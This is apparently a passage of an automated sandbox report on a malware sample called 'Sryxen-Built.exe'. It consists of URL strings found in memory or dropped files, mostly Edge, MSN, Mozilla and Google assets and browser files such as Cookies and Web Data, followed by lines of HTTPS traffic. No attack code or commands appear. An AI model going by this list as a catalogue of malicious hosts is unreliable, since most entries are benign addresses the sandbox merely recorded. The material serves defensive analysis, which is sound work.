Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as |
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1 |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset |
Source: 000003.log9.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset |
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset |
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset |
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset |
Source: HubApps Icons.6.dr, f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://excel.new?from=EdgeM365Shoreline |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://gaana.com/ |
Source: 8uliCbB.db.0.dr | String found in binary or memory: https://gemini.google.com/app?q= |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://i.y.qq.com/n2/m/index.html |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://img-s-msn-com.akamaized.net/ |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://m.kugou.com/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://m.soundcloud.com/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://m.vk.com/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://mail.google.com/mail/mu/mp/266/#tl/Inbox |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://manifestdeliveryservice.edgebrowser.microsoft-staging-falcon.io/app/page-context-demo |
Source: Cookies.7.dr | String found in binary or memory: https://msn.comXID/ |
Source: Cookies.7.dr | String found in binary or memory: https://msn.comXIDv10 |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://music.amazon.com |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://music.apple.com |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://music.yandex.com |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://ntp.msn.cn/edge/ntp |
Source: 000003.log5.6.dr, 2cc80dabc69f58b6_0.6.dr | String found in binary or memory: https://ntp.msn.com |
Source: 000003.log.6.dr | String found in binary or memory: https://ntp.msn.com/ |
Source: 000003.log.6.dr | String found in binary or memory: https://ntp.msn.com/0 |
Source: QuotaManager.6.dr | String found in binary or memory: https://ntp.msn.com/_default |
Source: 000003.log.6.dr, 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://ntp.msn.com/edge/ntp |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288 |
Source: Session_13385951551391722.6.dr | String found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&start |
Source: QuotaManager.6.dr | String found in binary or memory: https://ntp.msn.com/ntp.msn.com_default |
Source: 2cc80dabc69f58b6_0.6.dr | String found in binary or memory: https://ntp.msn.comService-Worker-Allowed: |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://open.spotify.com |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://outlook.live.com/mail/0/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://outlook.office.com/mail/0/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://sb.scorecardresearch.com/ |
Source: Sryxen-Built.exe | String found in binary or memory: https://sectigo.com/CPS0 |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://srtb.msn.cn/ |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://srtb.msn.com/ |
Source: C6DPeS7.db.0.dr | String found in binary or memory: https://support.mozilla.org |
Source: C6DPeS7.db.0.dr | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br |
Source: C6DPeS7.db.0.dr | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://tidal.com/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://twitter.com/ |
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.6.dr | String found in binary or memory: https://unitedstates1.ss.wd.microsoft.us/ |
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.6.dr | String found in binary or memory: https://unitedstates2.ss.wd.microsoft.us/ |
Source: edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.6.dr | String found in binary or memory: https://unitedstates4.ss.wd.microsoft.us/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://vibe.naver.com/today |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://web.telegram.org/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://web.whatsapp.com |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://word.new?from=EdgeM365Shoreline |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.deezer.com/ |
Source: Sryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.dr | String found in binary or memory: https://www.ecosia.org/newtab/v20 |
Source: content.js.6.dr, content_new.js.6.dr | String found in binary or memory: https://www.google.com/chrome |
Source: Sryxen-Built.exe, 00000000.00000003.1331742804.00000273002B8000.00000004.00000020.00020000.00000000.sdmp, 8uliCbB.db.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico |
Source: Web Data.6.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.iheart.com/podcast/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.instagram.com |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.last.fm/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.messenger.com |
Source: C6DPeS7.db.0.dr | String found in binary or memory: https://www.mozilla.org |
Source: C6DPeS7.db.0.dr | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2 |
Source: C6DPeS7.db.0.dr | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR |
Source: history.txt.0.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ |
Source: Sryxen-Built.exe, 00000000.00000003.1331072733.0000027301F70000.00000004.00000020.00020000.00000000.sdmp, p2xLIfH.db.0.dr, C6DPeS7.db.0.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox |
Source: C6DPeS7.db.0.dr | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig |
Source: Sryxen-Built.exe, 00000000.00000003.1331072733.0000027301F70000.00000004.00000020.00020000.00000000.sdmp, p2xLIfH.db.0.dr, C6DPeS7.db.0.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www. |
Source: 2cc80dabc69f58b6_1.6.dr | String found in binary or memory: https://www.msn.com/web-notification-icon-light.png |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1 |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1 |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.office.com |
Source: Top Sites.6.dr | String found in binary or memory: https://www.office.com/ |
Source: Top Sites.6.dr | String found in binary or memory: https://www.office.com/Office |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1 |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2 |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1 |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2 |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.tiktok.com/ |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://www.youtube.com |
Source: f4ed3038-c484-4352-8a8b-ff9e4eb902f1.tmp.6.dr | String found in binary or memory: https://y.music.163.com/m/ |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740 |
Source: unknown | Network traffic detected: HTTP traffic on port 49781 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49769 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49826 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735 |
Source: unknown | Network traffic detected: HTTP traffic on port 49772 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49734 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown | Network traffic detected: HTTP traffic on port 49837 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49763 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49823 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49729 |
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728 |
Source: unknown | Network traffic detected: HTTP traffic on port 49777 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727 |
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49729 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 49828 -> 443 |
